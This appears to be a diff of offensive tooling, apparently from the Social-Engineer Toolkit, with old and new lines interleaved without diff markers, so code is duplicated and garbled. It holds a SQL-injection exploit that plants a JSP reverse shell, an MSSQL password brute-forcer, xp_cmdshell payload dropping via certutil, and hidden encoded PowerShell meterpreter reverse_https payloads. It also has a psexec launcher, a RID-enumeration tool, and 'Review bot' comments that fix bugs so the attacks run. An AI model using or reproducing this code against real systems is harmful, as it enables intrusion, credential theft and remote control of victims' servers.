%>'''.format(lhost=lhost, lport=lport)
jsp = jsp.replace("\n", "")
jsp = jsp.replace("\t", "")
prepayload = "AAA' "
prepayload += 'union select 0x%s,2,3,4,5,6,7,8,9,10,11,12,13,14 into outfile "%s"' % (
jsp.encode('hex'), output_path)
prepayload += 'union select 0x{0},2,3,4,5,6,7,8,9,10,11,12,13,14 into outfile "{1}"'.format(binascii.hexlify(jsp.encode('ascii')), output_path)
prepayload += "#"
postpayload = "1' or 1=1#--"
loginstate = 'checkLogin'
password = 'OHAI'
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
post_params = urllib.parse.urlencode(
{'loginState': loginstate, 'loginName': prepayload, 'password': password})
cj = CookieJar()
opener = build_opener(HTTPCookieProcessor(cj))
post_params = urlencode({'loginState': loginstate, 'loginName': prepayload, 'password': password})
print("[*] Sending evil payload")
resp = opener.open("http://%s:9000/LoginServlet" % rhost, post_params)
opener.open("http://{0}:9000/LoginServlet".format(rhost), post_params.encode())
print("[*] Triggering shell")
post_params = urllib.parse.urlencode(
{'loginState': loginstate, 'loginName': postpayload, 'password': password})
resp = opener.open("http://%s:9000/LoginServlet" % rhost, post_params)
resp = opener.open("http://%s:9000/%s" % (rhost, filename))
print("[*] Check your shell on %s %s\n" % (lhost, lport))
post_params = urlencode({'loginState': loginstate, 'loginName': postpayload, 'password': password})
opener.open("http://{0}:9000/LoginServlet".format(rhost), post_params.encode())
opener.open("http://{0}:9000/{1}".format(rhost, filename))
print("[*] Check your shell on {0} {1}\n".format(lhost, lport))
# 01010011 01101100 01100101 01100101 01110000 01101001 01110011 01101111
# 01110110 01100101 01110010 01110010 01100001 01110100 01100101 01100100
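Review bot: `binascii.hexlify(jsp.encode('ascii'))` returns bytes, so under the Py3 import branch this commit adds, the `{0}` placeholder renders it as `b'...'` inside the `0x` literal, whereas the old `jsp.encode('hex')` yielded a str. Decoding the result, `binascii.hexlify(jsp.encode('ascii')).decode('ascii')`, keeps the value a plain hex string on both interpreters. The responses of the three `opener.open(...)` calls are now discarded, so a non-2xx reply surfaces only as an uncaught HTTPError; that is acceptable for a one-shot script but worth a comment.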


@ -1,24 +1,31 @@
#!/usr/bin/env python
from src.core.setcore import *
import sys
import subprocess
import socket
import re
import os
import time
import binascii
import base64
import shutil
# coding=utf-8
import _mssql
import binascii
import os
import shutil
import subprocess
import time
import src.core.setcore as core
import src.core.tds as tds
from src.core.payloadgen import create_payloads
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
#
# this is the mssql modules
#
# define the base path
definepath = definepath()
operating_system = check_os()
msf_path = meta_path()
definepath = core.definepath()
operating_system = core.check_os()
msf_path = core.meta_path()
#
# this is the brute forcer
@ -27,234 +34,264 @@ def brute(ipaddr, username, port, wordlist):
# if ipaddr being passed is invalid
if ipaddr == "":
return False
if ipaddr != "":
# base counter for successful brute force
counter = 0
# build in quick wordlist
if wordlist == "default":
wordlist = "src/fasttrack/wordlist.txt"
# read in the file
password = open(wordlist, "r")
for passwords in password:
passwords = passwords.rstrip()
if ":" in ipaddr:
ipaddr = ipaddr.split(":")
ipaddr, port = ipaddr
ipaddr = str(ipaddr)
port = str(port)
# base counter for successful brute force
counter = 0
# build in quick wordlist
if wordlist == "default":
wordlist = "src/fasttrack/wordlist.txt"
# read in the file
successful_password = None
with open(wordlist) as passwordlist:
for password in passwordlist:
password = password.rstrip()
# try actual password
try:
# connect to the sql server and attempt a password
if ":" in ipaddr:
ipaddr = ipaddr.split(":")
port = ipaddr[1]
ipaddr = ipaddr[0]
ipaddr = str(ipaddr)
port = str(port)
print("Attempting to brute force {bold}{ipaddr}:{port}{endc}"
" with username of {bold}{username}{endc}"
" and password of {bold}{passwords}{endc}".format(ipaddr=ipaddr,
username=username,
passwords=password,
port=port,
bold=core.bcolors.BOLD,
endc=core.bcolors.ENDC))
print("Attempting to brute force " + bcolors.BOLD + ipaddr + ":" + port + bcolors.ENDC + " with username of " + bcolors.BOLD + username + bcolors.ENDC + " and password of " + bcolors.BOLD + passwords + bcolors.ENDC)
# connect to the sql server and attempt a password
if ":" in ipaddr:
ipaddr = ipaddr.split(":")
port = ipaddr[1]
ipaddr = ipaddr[0]
target_server = _mssql.connect(ipaddr + ":" + str(port), username, passwords)
target_server = _mssql.connect("{0}:{1}".format(ipaddr, port),
username,
password)
if target_server:
print_status("\nSuccessful login with username %s and password: %s" % (
username, passwords))
core.print_status("\nSuccessful login with username {0} and password: {1}".format(username,
password))
counter = 1
successful_password = password
break
# if login failed or unavailable server
except Exception as e:
except:
pass
# if we brute forced a machine
if counter == 1:
if ":" in ipaddr:
ipaddr = ipaddr.split(":")
ipaddr = ipaddr[0]
return ipaddr + "," + username + "," + str(port) + "," + passwords
# else we didnt and we need to return a false
else:
if ipaddr != '':
print_warning("Unable to guess the SQL password for %s with username of %s" % (
ipaddr, username))
return False
# if we brute forced a machine
if counter == 1:
return ",".join([ipaddr, username, port, successful_password])
# else we didnt and we need to return a false
else:
if ipaddr:
core.print_warning("Unable to guess the SQL password for {0} with username of {1}".format(ipaddr, username))
return False
#
# this will deploy an already prestaged executable that reads in hexadecimal and back to binary
#
def deploy_hex2binary(ipaddr, port, username, password):
# base variable used to select payload option
choice1 = "1"
option = None
conn = _mssql.connect(ipaddr + ":" + str(port), username, password)
print_status("Enabling the xp_cmdshell stored procedure...")
conn = _mssql.connect("{0}:{1}".format(ipaddr, port),
username,
password)
core.print_status("Enabling the xp_cmdshell stored procedure...")
try:
conn.execute_query("exec master.dbo.sp_configure 'show advanced options',1;GO;RECONFIGURE;GO;exec master.dbo.sp_configure 'xp_cmdshell', 1;GO;RECONFIGURE;GO")
except: pass
conn.execute_query("exec master.dbo.sp_configure 'show advanced options',1;"
"GO;"
"RECONFIGURE;"
"GO;"
"exec master.dbo.sp_configure 'xp_cmdshell', 1;"
"GO;"
"RECONFIGURE;"
"GO")
except:
pass
# just throw a simple command via powershell to get the output
try:
print("""Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary""")
choice = raw_input("Enter your choice:\n\n1.) Use PowerShell Injection (recommended)\n2.) Use Certutil binary conversion\n\nEnter your choice [1]:")
if choice == "": choice = "1"
if choice == "1":
print_status("Powershell injection was selected to deploy to the remote system (awesome).")
option_ps = input(
"Do you want to use powershell injection? [yes/no]:")
if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes":
option = "1"
print_status("Powershell delivery selected. Boom!")
else:
print("""Pick which deployment method to use. The first is PowerShell
and should be used on any modern operating system. The second method
will use the certutil method to convert a binary to a binary""")
choice = input("Enter your choice:\n\n"
"1.) Use PowerShell Injection (recommended)\n"
"2.) Use Certutil binary conversion\n\n"
"Enter your choice [1]:")
if choice == "":
choice = "1"
if choice == "1":
core.print_status("Powershell injection was selected to deploy to the remote system (awesome).")
option_ps = input("Do you want to use powershell injection? [yes/no]:")
if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes":
option = "1"
core.print_status("Powershell delivery selected. Boom!")
else:
option = "2"
# otherwise, fall back to the older version using debug conversion via hex
else:
core.print_status("Powershell not selected, using debug method.")
option = "2"
# otherwise, fall back to the older version using debug conversion via hex
else:
print_status("Powershell not selected, using debug method.")
option = "2"
except Exception as err:
print err
print(err)
payload_filename = None
# if we don't have powershell
if option == "2":
# give option to use msf or your own
print_status("You can either select to use a default Metasploit payload here or import your own in order to deliver to the system. Note that if you select your own, you will need to create your own listener at the end in order to capture this.")
choice1 = raw_input("\n\n1.) Use Metasploit (default)\n2.) Select your own\n\nEnter your choice[1]:")
if choice1 == "": choice1 = "1"
core.print_status("You can either select to use a default "
"Metasploit payload here or import your "
"own in order to deliver to the system. "
"Note that if you select your own, you "
"will need to create your own listener "
"at the end in order to capture this.\n\n")
choice1 = input("1.) Use Metasploit (default)\n"
"2.) Select your own\n\n"
"Enter your choice[1]:")
if choice1 == "":
choice1 = "1"
if choice1 == "2":
filename = raw_input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):")
if os.path.isfile(filename):
fileopen = open(filename, "rb")
else:
print_error("File not found! Try again.")
filename = raw_input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):")
if os.path.isfile(filename):
fileopen = open(filename, "rb")
attempts = 0
while attempts <= 2:
payload_filename = input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):")
if os.path.isfile(payload_filename):
break
else:
print_error("Computers are hard. Find the path and try again. Defaulting to Metasploit payload.")
choice1 = "1"
core.print_error("File not found! Try again.")
attempts += 1
else:
core.print_error("Computers are hard. Find the path and try again. Defaulting to Metasploit payload.")
choice1 = "1"
if choice1 == "1":
web_path = None
try:
module_reload(src.core.payloadgen.create_payloads)
core.module_reload(create_payloads)
except:
import src.core.payloadgen.create_payloads
# if we are using a SET interactive shell payload then we need to make
# the path under web_clone versus ~./set
if os.path.isfile(setdir + "/set.payload"):
web_path = (setdir + "/web_clone/")
if os.path.isfile(os.path.join(core.setdir, "set.payload")):
web_path = os.path.join(core.setdir, "web_clone")
# then we are using metasploit
if not os.path.isfile(setdir + "/set.payload"):
if operating_system == "posix":
web_path = (setdir)
# if it isn't there yet
if not os.path.isfile(setdir + "/1msf.exe"):
# move it then
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
(setdir, setdir), shell=True).wait()
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
(setdir, setdir), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
(setdir, setdir), shell=True).wait()
else:
if operating_system == "posix":
web_path = core.setdir
# if it isn't there yet
if not os.path.isfile(core.setdir + "1msf.exe"):
# move it then
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
(core.setdir, core.setdir), shell=True).wait()
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir), shell=True).wait()
payload_filename = os.path.join(web_path, "1msf.exe")
if choice1 == "1":
fileopen = open("%s/1msf.exe" % (web_path), "rb")
with open(payload_filename, "rb") as fileopen:
# read in the binary
data = fileopen.read()
# convert the binary to hex
data = binascii.hexlify(data)
# we write out binary out to a file
# read in the binary
data = fileopen.read()
# convert the binary to hex
data = binascii.hexlify(data)
# we write out binary out to a file
filewrite = open(setdir + "/payload.hex", "w")
filewrite.write(data)
filewrite.close()
with open(os.path.join(core.setdir, "payload.hex"), "w") as filewrite:
filewrite.write(data)
if choice1 == "1":
# if we are using metasploit, start the listener
if not os.path.isfile(setdir + "/set.payload"):
if not os.path.isfile(os.path.join(core.setdir, "set.payload")):
if operating_system == "posix":
try:
module_reload(pexpect)
core.module_reload(pexpect)
except:
import pexpect
print_status("Starting the Metasploit listener...")
msf_path = meta_path()
child2 = pexpect.spawn("%smsfconsole -r %s/meta_config\r\n\r\n" % (meta_path(), setdir))
core.print_status("Starting the Metasploit listener...")
msf_path = core.meta_path()
child2 = pexpect.spawn("{0}-r {1}\r\n\r\n".format(os.path.join(core.meta_path(), "msfconsole"),
os.path.join(core.setdir, "meta_config")))
# random executable name
random_exe = generate_random_string(10, 15)
random_exe = core.generate_random_string(10, 15)
#
# next we deploy our hex to binary if we selected option 1 (powershell)
#
if option == "1":
print_status(
"Using universal powershell x86 process downgrade attack..")
core.print_status("Using universal powershell x86 process downgrade attack..")
payload = "x86"
# specify ipaddress of reverse listener
ipaddr = grab_ipaddress()
update_options("IPADDR=" + ipaddr)
port = input(
setprompt(["29"], "Enter the port for the reverse [443]"))
if port == "":
ipaddr = core.grab_ipaddress()
core.update_options("IPADDR=" + ipaddr)
port = input(core.setprompt(["29"], "Enter the port for the reverse [443]"))
if not port:
port = "443"
update_options("PORT=" + port)
update_options("POWERSHELL_SOLO=ON")
print_status(
"Prepping the payload for delivery and injecting alphanumeric shellcode...")
filewrite = open(setdir + "/payload_options.shellcode", "w")
# format needed for shellcode generation
filewrite.write("windows/meterpreter/reverse_https" + " " + port + ",")
filewrite.close()
core.update_options("PORT={0}".format(port))
core.update_options("POWERSHELL_SOLO=ON")
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
with open(os.path.join(core.setdir, "/payload_options.shellcode"), "w") as filewrite:
# format needed for shellcode generation
filewrite.write("windows/meterpreter/reverse_https {0},".format(port))
try:
module_reload(src.payloads.powershell.prep)
core.module_reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
# create the directory if it does not exist
if not os.path.isdir(setdir + "/reports/powershell"):
os.makedirs(setdir + "/reports/powershell")
x86 = open(setdir + "/x86.powershell", "r")
x86 = x86.read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand " + x86
print_status(
"If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = open(
setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86)
filewrite.close()
# create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir, "reports/powershell")):
os.makedirs(os.path.join(core.setdir, "reports/powershell"))
with open(os.path.join(core.setdir, "x86.powershell")) as x86:
x86 = x86.read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
core.print_status("If you want the powershell commands and attack, "
"they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell")))
with open(os.path.join(core.setdir, "/reports/powershell/x86_powershell_injection.txt"), "w") as filewrite:
filewrite.write(x86)
# if our payload is x86 based - need to prep msfconsole rc
if payload == "x86":
powershell_command = x86
powershell_dir = setdir + "/reports/powershell/x86_powershell_injection.txt"
filewrite = open(setdir + "/reports/powershell/powershell.rc", "w")
filewrite.write(
"use multi/handler\nset payload windows/meterpreter/reverse_https\nset lport %s\nset LHOST 0.0.0.0\nexploit -j" % (port))
filewrite.close()
# powershell_dir = core.setdir + "/reports/powershell/x86_powershell_injection.txt"
with open(os.path.join(core.setdir, "reports/powershell/powershell.rc"), "w") as filewrite:
filewrite.write("use multi/handler\n"
"set payload windows/meterpreter/reverse_https\n"
"set lport {0}\n"
"set LHOST 0.0.0.0\n"
"exploit -j".format(port))
else:
powershell_command = None
# grab the metasploit path from config or smart detection
msf_path = meta_path()
msf_path = core.meta_path()
if operating_system == "posix":
try:
module_reload(pexpect)
core.module_reload(pexpect)
except:
import pexpect
print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn(
"%smsfconsole -r %s/reports/powershell/powershell.rc" % (msf_path, setdir))
print_status(
"Waiting for the listener to start first before we continue forward...")
print_status(
"Be patient, Metaploit takes a little bit to start...")
core.print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"),
os.path.join(core.setdir, "reports/powershell/powershell.rc")))
core.print_status("Waiting for the listener to start first before we continue forward...")
core.print_status("Be patient, Metaploit takes a little bit to start...")
child2.expect("Starting the payload handler", timeout=30000)
print_status(
"Metasploit started... Waiting a couple more seconds for listener to activate..")
core.print_status("Metasploit started... Waiting a couple more seconds for listener to activate..")
time.sleep(5)
# assign random_exe command to the powershell command
@ -267,31 +304,33 @@ def deploy_hex2binary(ipaddr, port, username, password):
if option == "2":
# here we start the conversion and execute the payload
print_status("Sending the main payload via to be converted back to a binary.")
core.print_status("Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time
fileopen = open(setdir + "/payload.hex", "r")
print_status("Dropping inital begin certificate header...")
conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > %s.crt'" % (random_exe))
while fileopen:
data = fileopen.read(900).rstrip()
# if data is done then break out of loop because file is over
if data == "":
break
print_status("Deploying payload to victim machine (hex): " + bcolors.BOLD + str(data) + bcolors.ENDC + "\n")
conn.execute_query("exec master..xp_cmdshell 'echo %s >> %s.crt'" % (data, random_exe))
print_status("Delivery complete. Converting hex back to binary format.")
print_status("Dropping end header for binary format converstion...")
conn.execute_query("exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> %s.crt'" % (random_exe))
print_status("Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled.")
conn.execute_query("exec master..xp_cmdshell 'certutil -decode %s.crt %s.exe'" % (random_exe, random_exe))
print_status("Executing the payload - magic has happened and now its time for that moment.. You know. When you celebrate. Salute to you ninja - you deserve it.")
conn.execute_query("exec master..xp_cmdshell '%s.exe'" % (random_exe))
with open(os.path.join(core.setdir, 'payload.hex')) as fileopen:
core.print_status("Dropping initial begin certificate header...")
conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe))
for data in fileopen.read(900).rstrip():
if not data:
continue
core.print_status("Deploying payload to victim machine (hex): {bold}{data}{endc}\n".format(bold=core.bcolors.BOLD,
data=data,
endc=core.bcolors.ENDC))
conn.execute_query("exec master..xp_cmdshell 'echo {data} >> {exe}.crt'".format(data=data,
exe=random_exe))
core.print_status("Delivery complete. Converting hex back to binary format.")
core.print_status("Dropping end header for binary format conversion...")
conn.execute_query("exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> {0}.crt'".format(random_exe))
core.print_status("Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled.")
conn.execute_query("exec master..xp_cmdshell 'certutil -decode {0}.crt {0}.exe'".format(random_exe))
core.print_status("Executing the payload - magic has happened and now its time for that moment.. "
"You know. When you celebrate. Salute to you ninja - you deserve it.")
conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe))
# if we are using SET payload
if choice1 == "1":
if os.path.isfile(setdir + "/set.payload"):
print_status("Spawning seperate child process for listener...")
if os.path.isfile(os.path.join(core.setdir, "set.payload")):
core.print_status("Spawning separate child process for listener...")
try:
shutil.copyfile(setdir + "/web_clone/x", definepath)
shutil.copyfile(os.path.join(core.setdir, "web_clone/x"), definepath)
except:
pass
@ -299,42 +338,43 @@ def deploy_hex2binary(ipaddr, port, username, password):
subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True)
# grab the port options
if check_options("PORT=") != 0:
port = check_options("PORT=")
# if for some reason the port didnt get created we default to 443
else:
port = "443"
# if core.check_options("PORT=") != 0:
# port = core.heck_options("PORT=")
#
# # if for some reason the port didnt get created we default to 443
# else:
# port = "443"
# thread is needed here due to the connect not always terminating thread,
# it hangs if thread isnt specified
try:
module_reload(thread)
core.module_reload(thread)
except:
import thread
# execute the payload
# we append more commands if option 1 is used
if option == "1":
print_status("Triggering the powershell injection payload... ")
sql_command = ("exec master..xp_cmdshell '%s'" % (powershell_command))
core.print_status("Triggering the powershell injection payload... ")
sql_command = ("exec master..xp_cmdshell '{0}'".format(powershell_command))
thread.start_new_thread(conn.execute_query, (sql_command,))
# using the old method
if option == "2":
print_status("Triggering payload stager...")
core.print_status("Triggering payload stager...")
alphainject = ""
if os.path.isfile(setdir + "meterpreter.alpha"):
alphainject = fileopen(setdir + "meterpreter.alpha", "r").read()
if os.path.isfile(os.path.join(core.setdir, "meterpreter.alpha")):
with open(os.path.join(core.setdir, "meterpreter.alpha")) as fileopen:
alphainject = fileopen.read()
sql_command = ("xp_cmdshell '%s.exe %s'" % (random_exe, alphainject))
sql_command = ("xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject))
# start thread of SQL command that executes payload
thread.start_new_thread(conn.execute_query, (sql_command,))
time.sleep(1)
# if pexpect doesnt exit right then it freaks out
if choice1 == "1":
if os.path.isfile(setdir + "/set.payload"):
if os.path.isfile(os.path.join(core.setdir, "set.payload")):
os.system("python ../../payloads/set_payloads/listener.py")
try:
# interact with the child process through pexpect
@ -352,27 +392,30 @@ def deploy_hex2binary(ipaddr, port, username, password):
#
def cmdshell(ipaddr, port, username, password, option):
# connect to SQL server
import src.core.tds as tds
mssql = tds.MSSQL(ipaddr, int(port))
mssql.connect()
mssql.login("master", username, password)
print_status("Connection established with SQL Server...")
print_status("Attempting to re-enable xp_cmdshell if disabled...")
core.print_status("Connection established with SQL Server...")
core.print_status("Attempting to re-enable xp_cmdshell if disabled...")
try:
mssql.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
except Exception as e:
mssql.sql_query("exec master.dbo.sp_configure 'show advanced options',1;"
"RECONFIGURE;"
"exec master.dbo.sp_configure 'xp_cmdshell', 1;"
"RECONFIGURE;")
except:
pass
print_status("Enter your Windows Shell commands in the xp_cmdshell - prompt...")
while 1:
core.print_status("Enter your Windows Shell commands in the xp_cmdshell - prompt...")
while True:
# prompt mssql
cmd = input("mssql>")
# if we want to exit
if cmd == "quit" or cmd == "exit":
break
# if the command isnt empty
if cmd != "":
elif cmd:
# execute the command
mssql.sql_query("exec master..xp_cmdshell '%s'" % (cmd))
mssql.sql_query("exec master..xp_cmdshell '{0}'".format(cmd))
# print the rest of the data
mssql.printReplies()
mssql.colMeta[0]['TypeData'] = 80 * 2


@ -1,9 +1,20 @@
# coding=utf-8
#############################################
#
# Main SET module for psexec
#
#############################################
from src.core.setcore import *
import os
import subprocess
import src.core.setcore as core
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
# Module options (auxiliary/admin/smb/psexec_command):
@ -17,28 +28,24 @@ from src.core.setcore import *
# SMBSHARE C$ yes The name of a writeable share on the server
# SMBUser no The username to authenticate as
# THREADS 1 yes The number of concurrent threads
# WINPATH WINDOWS yes The name of the
# remote Windows directory
# WINPATH WINDOWS yes The name of the remote Windows directory
# msf auxiliary(psexec_command) >
# grab config options for stage encoding
stage_encoding = check_config("STAGE_ENCODING=").lower()
stage_encoding = core.check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off":
stage_encoding = "false"
else:
stage_encoding = "true"
rhosts = input(setprompt(
["32"], "Enter the IP Address or range (RHOSTS) to connect to")) # rhosts
rhosts = input(core.setprompt(["32"], "Enter the IP Address or range (RHOSTS) to connect to")) # rhosts
# username for domain/workgroup
username = input(setprompt(["32"], "Enter the username"))
username = input(core.setprompt(["32"], "Enter the username"))
# password for domain/workgroup
password = input(setprompt(["32"], "Enter the password or the hash"))
domain = input(setprompt(
["32"], "Enter the domain name (hit enter for logon locally)")) # domain name
threads = input(
setprompt(["32"], "How many threads do you want [enter for default]"))
password = input(core.setprompt(["32"], "Enter the password or the hash"))
domain = input(core.setprompt(["32"], "Enter the domain name (hit enter for logon locally)")) # domain name
threads = input(core.setprompt(["32"], "How many threads do you want [enter for default]"))
# if blank specify workgroup which is the default
if domain == "":
domain = "WORKGROUP"
@ -46,7 +53,7 @@ if domain == "":
if threads == "":
threads = "15"
payload = check_config("POWERSHELL_INJECT_PAYLOAD_X86=").lower()
payload = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=").lower()
#
# payload generation for powershell injection
@ -54,50 +61,62 @@ payload = check_config("POWERSHELL_INJECT_PAYLOAD_X86=").lower()
try:
# specify ipaddress of reverse listener
ipaddr = grab_ipaddress()
update_options("IPADDR=" + ipaddr)
port = input(setprompt(["29"], "Enter the port for the reverse [443]"))
# specify ipaddress of reverse listener
ipaddr = core.grab_ipaddress()
core.update_options("IPADDR=" + ipaddr)
port = input(core.setprompt(["29"], "Enter the port for the reverse [443]"))
if port == "":
port = "443"
update_options("PORT=" + port)
filewrite = open(setdir + "/payload_options.shellcode", "w")
# format needed for shellcode generation
filewrite.write(payload + " " + port + ",")
filewrite.close()
update_options("POWERSHELL_SOLO=ON")
print_status(
"Prepping the payload for delivery and injecting alphanumeric shellcode...")
core.update_options("PORT={0}".format(port))
with open(os.path.join(core.setdir, "/payload_options.shellcode"), "w") as filewrite:
# format needed for shellcode generation
filewrite.write("{0} {1},".format(payload, port))
core.update_options("POWERSHELL_SOLO=ON")
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
try:
module_reload(src.payloads.powershell.prep)
core.module_reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
# create the directory if it does not exist
if not os.path.isdir(setdir + "/reports/powershell"):
os.makedirs(setdir + "/reports/powershell")
x86 = open(setdir + "/x86.powershell", "r")
x86 = x86.read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand " + x86
print_status(
"If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = open(
setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86)
filewrite.close()
# create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir, "reports/powershell")):
os.makedirs(os.path.join(core.setdir, "reports/powershell"))
with open(os.path.join(core.setdir, "x86.powershell")) as fileopen:
x86 = fileopen.read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell")))
with open(os.path.join(core.setdir, "/reports/powershell/x86_powershell_injection.txt", "w")) as filewrite:
filewrite.write(x86)
payload = "windows/meterpreter/reverse_https\n" # if we are using x86
command = x86 # assign powershell to command
# write out our answer file for the powershell injection attack
filewrite = open(setdir + "/reports/powershell/powershell.rc", "w")
filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_https\nset LPORT %s\nset LHOST 0.0.0.0\nset ExitOnSession false\nexploit -j\nuse auxiliary/admin/smb/psexec_command\nset RHOSTS %s\nset SMBUser %s\nset SMBPass %s\nset SMBDomain %s\nset THREADS %s\nset COMMAND %s\nset EnableStageEncoding %s\nset ExitOnSession false\nexploit\n" %
(port, rhosts, username, password, domain, threads, command, stage_encoding))
filewrite.close()
with open(core.setdir + "/reports/powershell/powershell.rc", "w") as filewrite:
filewrite.write("use multi/handler\n"
"set payload windows/meterpreter/reverse_https\n"
"set LPORT {0}\n"
"set LHOST 0.0.0.0\n"
"set ExitOnSession false\n"
"exploit -j\n"
"use auxiliary/admin/smb/psexec_command\n"
"set RHOSTS {1}\n"
"set SMBUser {2}\n"
"set SMBPass {3}\n"
"set SMBDomain {4}\n"
"set THREADS {5}\n"
"set COMMAND {6}\n"
"set EnableStageEncoding {7}\n"
"set ExitOnSession false\n"
"exploit\n".format(port, rhosts, username, password, domain, threads, command, stage_encoding))
# launch metasploit below
print_status("Launching Metasploit.. This may take a few seconds.")
subprocess.Popen("%smsfconsole -r %s/reports/powershell/powershell.rc" %
(meta_path(), setdir), shell=True).wait()
core.print_status("Launching Metasploit.. This may take a few seconds.")
subprocess.Popen("{0} -r {1}".format(os.path.join(core.meta_path(), "msfconsole"),
os.path.join(core.setdir, "reports/powershell/powershell.rc")),
shell=True).wait()
# handle exceptions
except Exception as e:
print_error("Something went wrong printing error: " + str(e))
core.print_error("Something went wrong printing error: {0}".format(e))
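Review bot: The rewritten `open()` for the x86 injection export puts the `"w"` mode inside `os.path.join(...)` instead of passing it to `open`, so the call opens `/reports/powershell/x86_powershell_injection.txt/w` for reading, raises, and the outer `except Exception` at the bottom of the section swallows it as "Something went wrong" — the psexec attack never launches. The leading slash is the second problem: `os.path.join(core.setdir, "/payload_options.shellcode")` and `os.path.join(core.setdir, "/reports/powershell/...")` discard `core.setdir` entirely (an absolute second component resets the join), so the shellcode options file lands at the filesystem root where `src.payloads.powershell.prep` presumably will not look for it. Both lines should read `with open(os.path.join(core.setdir, "payload_options.shellcode"), "w") as filewrite:` and `with open(os.path.join(core.setdir, "reports/powershell/x86_powershell_injection.txt"), "w") as filewrite:`, matching the relative-path form already used for the `reports/powershell` directory check a few lines earlier. Unrelated to this commit but worth a comment in the new block: `powershell.rc` is written with the SMB password or hash, username and target range in clear text under `reports/powershell/`, so operators should be told the file is sensitive and should be cleaned up after the engagement.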


@ -1,396 +0,0 @@
#!/usr/bin/python
import subprocess
import os
import sys
##########################################################################
#
# RID Enum
# RID Cycling Tool
#
# Written by: David Kennedy (ReL1K)
# Website: https://www.trustedsec.com
# Twitter: @TrustedSec
# Twitter: @HackingDave
#
# This tool will use rpcclient to cycle through and identify what rid accounts exist. Uses a few
# different techniques to find the proper RID.
#
# Special thanks to Tom Steele for the pull request update and changes.
#
##########################################################################
def usage():
print("""
.______ __ _______ _______ .__ __. __ __ .___ ___.
| _ \ | | | \ | ____|| \ | | | | | | | \/ |
| |_) | | | | .--. | | |__ | \| | | | | | | \ / |
| / | | | | | | | __| | . ` | | | | | | |\/| |
| |\ \----.| | | '--' | | |____ | |\ | | `--' | | | | |
| _| `._____||__| |_______/ _____|_______||__| \__| \______/ |__| |__|
|______|
Written by: David Kennedy (ReL1K)
Company: https://www.trustedsec.com
Twitter: @TrustedSec
Twitter: @HackingDave
Rid Enum is a RID cycling attack that attempts to enumerate user accounts through
null sessions and the SID to RID enum. If you specify a password file, it will
automatically attempt to brute force the user accounts when its finished enumerating.
- RID_ENUM is open source and uses all standard python libraries minus python-pexpect. -
You can also specify an already dumped username file, it needs to be in the DOMAINNAME\\USERNAME
format.
Example: ./ridenum.py 192.168.1.50 500 50000 /root/dict.txt
Usage: ./ridenum.py <server_ip> <start_rid> <end_rid> <optional_password_file> <optional_username_filename>
""")
sys.exit()
# for nt-status-denied
denied = 0
# attempt to use lsa query first
def check_user_lsa(ip):
# pull the domain via lsaenum
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lsaquery"' % ip, stdout=subprocess.PIPE,
shell=True)
stdout_value = proc.communicate()[0]
# if the user wasn't found, return a False
if not "Domain Sid" in stdout_value:
return False
else:
return stdout_value
# attempt to lookup an account via rpcclient
def check_user(ip, account):
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lookupnames %s"' % (ip, account), stdout=subprocess.PIPE,
stderr=subprocess.PIPE, shell=True)
stdout_value = proc.communicate()[0]
# if the user wasn't found, return a False
